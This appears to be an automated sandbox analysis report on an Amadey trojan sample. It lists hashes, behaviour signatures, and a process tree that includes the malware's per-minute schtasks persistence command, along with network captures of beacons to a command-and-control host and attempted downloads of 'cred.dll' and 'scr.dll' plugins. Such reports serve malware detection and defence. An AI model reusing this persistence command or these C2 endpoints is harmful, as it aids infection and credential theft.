Analysis

  • max time kernel
    137s
  • max time network
    122s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    13/09/2024, 15:23 UTC

General

  • Target

    2a3b92f6180367306d750e59c9b6446b.exe

  • Size

    178KB

  • MD5

    2a3b92f6180367306d750e59c9b6446b

  • SHA1

    95fb90137086c731b84db0a1ce3f0d74d6931534

  • SHA256

    18fd6b193be1d5416a3188f5d9e4047cca719fa067d7d0169cf2df5c7fed54c0

  • SHA512

    c87cda81a0133db40be68e0dd94e39f986f3a32faa54d4a1420e071407c94fffdfef6d6ec8f3fdb893115d84ae12824436cf5785fdb2c77dafb96be858b3b5d0

  • SSDEEP

    3072:GK0YqBB9mUQ13o2vM2tD81JI0MBkuomh87I3pBSpvVFLm:GnrB9mUWdk26DIquom2dN

Score
10/10

Malware Config

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2a3b92f6180367306d750e59c9b6446b.exe
    "C:\Users\Admin\AppData\Local\Temp\2a3b92f6180367306d750e59c9b6446b.exe"
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2504
    • C:\ProgramData\3101f8f780\gbudn.exe
      "C:\ProgramData\3101f8f780\gbudn.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:3380
      • C:\Windows\SysWOW64\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gbudn.exe /TR "C:\ProgramData\3101f8f780\gbudn.exe" /F
        3⤵
        • System Location Discovery: System Language Discovery
        • Scheduled Task/Job: Scheduled Task
        PID:1408
  • C:\ProgramData\3101f8f780\gbudn.exe
    C:\ProgramData\3101f8f780\gbudn.exe
    1⤵
    • Executes dropped EXE
    PID:1216
  • C:\ProgramData\3101f8f780\gbudn.exe
    C:\ProgramData\3101f8f780\gbudn.exe
    1⤵
    • Executes dropped EXE
    PID:5072
  • C:\ProgramData\3101f8f780\gbudn.exe
    C:\ProgramData\3101f8f780\gbudn.exe
    1⤵
    • Executes dropped EXE
    PID:4460

Network

  • flag-us
    DNS
    196.249.167.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    196.249.167.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    mynexa.io
    gbudn.exe
    Remote address:
    8.8.8.8:53
    Request
    mynexa.io
    IN A
    Response
    mynexa.io
    IN A
    188.40.187.155
  • flag-de
    POST
    http://mynexa.io/hfv23svj2/index.php
    gbudn.exe
    Remote address:
    188.40.187.155:80
    Request
    POST /hfv23svj2/index.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: mynexa.io
    Content-Length: 83
    Cache-Control: no-cache
    Response
    HTTP/1.1 404 Not Found
    Server: nginx/1.27.1
    Date: Fri, 13 Sep 2024 15:23:44 GMT
    Transfer-Encoding: chunked
    Connection: keep-alive
    Keep-Alive: timeout=20
  • flag-de
    GET
    http://mynexa.io/hfv23svj2/plugins/cred.dll
    gbudn.exe
    Remote address:
    188.40.187.155:80
    Request
    GET /hfv23svj2/plugins/cred.dll HTTP/1.1
    Host: mynexa.io
    Response
    HTTP/1.1 404 Not Found
    Server: nginx/1.27.1
    Date: Fri, 13 Sep 2024 15:23:44 GMT
    Transfer-Encoding: chunked
    Connection: keep-alive
    Keep-Alive: timeout=20
  • flag-de
    GET
    http://mynexa.io/hfv23svj2/plugins/scr.dll
    gbudn.exe
    Remote address:
    188.40.187.155:80
    Request
    GET /hfv23svj2/plugins/scr.dll HTTP/1.1
    Host: mynexa.io
    Response
    HTTP/1.1 404 Not Found
    Server: nginx/1.27.1
    Date: Fri, 13 Sep 2024 15:23:55 GMT
    Transfer-Encoding: chunked
    Connection: keep-alive
    Keep-Alive: timeout=20
  • flag-de
    POST
    http://mynexa.io/hfv23svj2/index.php
    gbudn.exe
    Remote address:
    188.40.187.155:80
    Request
    POST /hfv23svj2/index.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: mynexa.io
    Content-Length: 83
    Cache-Control: no-cache
    Response
    HTTP/1.1 404 Not Found
    Server: nginx/1.27.1
    Date: Fri, 13 Sep 2024 15:24:45 GMT
    Transfer-Encoding: chunked
    Connection: keep-alive
    Keep-Alive: timeout=20
  • flag-us
    DNS
    155.187.40.188.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    155.187.40.188.in-addr.arpa
    IN PTR
    Response
    155.187.40.188.in-addr.arpa
    IN PTR
    static15518740188clients your-serverde
  • flag-us
    DNS
    fe3cr.delivery.mp.microsoft.com
    Remote address:
    8.8.8.8:53
    Request
    fe3cr.delivery.mp.microsoft.com
    IN A
    Response
    fe3cr.delivery.mp.microsoft.com
    IN CNAME
    fe3.delivery.mp.microsoft.com
    fe3.delivery.mp.microsoft.com
    IN CNAME
    glb.cws.prod.dcat.dsp.trafficmanager.net
    glb.cws.prod.dcat.dsp.trafficmanager.net
    IN A
    20.242.39.171
  • flag-us
    DNS
    134.32.126.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    134.32.126.40.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    95.221.229.192.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    95.221.229.192.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    133.211.185.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    133.211.185.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    228.249.119.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    228.249.119.40.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    103.169.127.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    103.169.127.40.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    171.39.242.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    171.39.242.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    44.56.20.217.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    44.56.20.217.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    81.144.22.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    81.144.22.2.in-addr.arpa
    IN PTR
    Response
    81.144.22.2.in-addr.arpa
    IN PTR
    a2-22-144-81deploystaticakamaitechnologiescom
  • flag-us
    DNS
    81.144.22.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    81.144.22.2.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    21.236.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    21.236.111.52.in-addr.arpa
    IN PTR
    Response
  • flag-de
    POST
    http://mynexa.io/hfv23svj2/index.php
    gbudn.exe
    Remote address:
    188.40.187.155:80
    Request
    POST /hfv23svj2/index.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: mynexa.io
    Content-Length: 83
    Cache-Control: no-cache
    Response
    HTTP/1.1 404 Not Found
    Server: nginx/1.27.1
    Date: Fri, 13 Sep 2024 15:25:45 GMT
    Transfer-Encoding: chunked
    Connection: keep-alive
    Keep-Alive: timeout=20
  • 188.40.187.155:80
    http://mynexa.io/hfv23svj2/index.php
    http
    gbudn.exe
    554 B
    418 B
    7
    6

    HTTP Request

    POST http://mynexa.io/hfv23svj2/index.php

    HTTP Response

    404
  • 188.40.187.155:80
    http://mynexa.io/hfv23svj2/index.php
    http
    gbudn.exe
    1.3kB
    915 B
    15
    10

    HTTP Request

    GET http://mynexa.io/hfv23svj2/plugins/cred.dll

    HTTP Response

    404

    HTTP Request

    GET http://mynexa.io/hfv23svj2/plugins/scr.dll

    HTTP Response

    404

    HTTP Request

    POST http://mynexa.io/hfv23svj2/index.php

    HTTP Response

    404
  • 188.40.187.155:80
    http://mynexa.io/hfv23svj2/index.php
    http
    gbudn.exe
    462 B
    338 B
    5
    4

    HTTP Request

    POST http://mynexa.io/hfv23svj2/index.php

    HTTP Response

    404
  • 8.8.8.8:53
    196.249.167.52.in-addr.arpa
    dns
    73 B
    147 B
    1
    1

    DNS Request

    196.249.167.52.in-addr.arpa

  • 8.8.8.8:53
    mynexa.io
    dns
    gbudn.exe
    55 B
    71 B
    1
    1

    DNS Request

    mynexa.io

    DNS Response

    188.40.187.155

  • 8.8.8.8:53
    155.187.40.188.in-addr.arpa
    dns
    150 B
    296 B
    2
    2

    DNS Request

    155.187.40.188.in-addr.arpa

    DNS Request

    fe3cr.delivery.mp.microsoft.com

    DNS Response

    20.242.39.171

  • 8.8.8.8:53
    134.32.126.40.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    134.32.126.40.in-addr.arpa

  • 8.8.8.8:53
    95.221.229.192.in-addr.arpa
    dns
    73 B
    144 B
    1
    1

    DNS Request

    95.221.229.192.in-addr.arpa

  • 8.8.8.8:53
    133.211.185.52.in-addr.arpa
    dns
    73 B
    147 B
    1
    1

    DNS Request

    133.211.185.52.in-addr.arpa

  • 8.8.8.8:53
    228.249.119.40.in-addr.arpa
    dns
    73 B
    159 B
    1
    1

    DNS Request

    228.249.119.40.in-addr.arpa

  • 8.8.8.8:53
    103.169.127.40.in-addr.arpa
    dns
    73 B
    147 B
    1
    1

    DNS Request

    103.169.127.40.in-addr.arpa

  • 8.8.8.8:53
    171.39.242.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    171.39.242.20.in-addr.arpa

  • 8.8.8.8:53
    44.56.20.217.in-addr.arpa
    dns
    71 B
    131 B
    1
    1

    DNS Request

    44.56.20.217.in-addr.arpa

  • 8.8.8.8:53
    81.144.22.2.in-addr.arpa
    dns
    140 B
    133 B
    2
    1

    DNS Request

    81.144.22.2.in-addr.arpa

    DNS Request

    81.144.22.2.in-addr.arpa

  • 8.8.8.8:53
    21.236.111.52.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    21.236.111.52.in-addr.arpa

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\3101f8f780\gbudn.exe

    Filesize

    178KB

    MD5

    2a3b92f6180367306d750e59c9b6446b

    SHA1

    95fb90137086c731b84db0a1ce3f0d74d6931534

    SHA256

    18fd6b193be1d5416a3188f5d9e4047cca719fa067d7d0169cf2df5c7fed54c0

    SHA512

    c87cda81a0133db40be68e0dd94e39f986f3a32faa54d4a1420e071407c94fffdfef6d6ec8f3fdb893115d84ae12824436cf5785fdb2c77dafb96be858b3b5d0

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.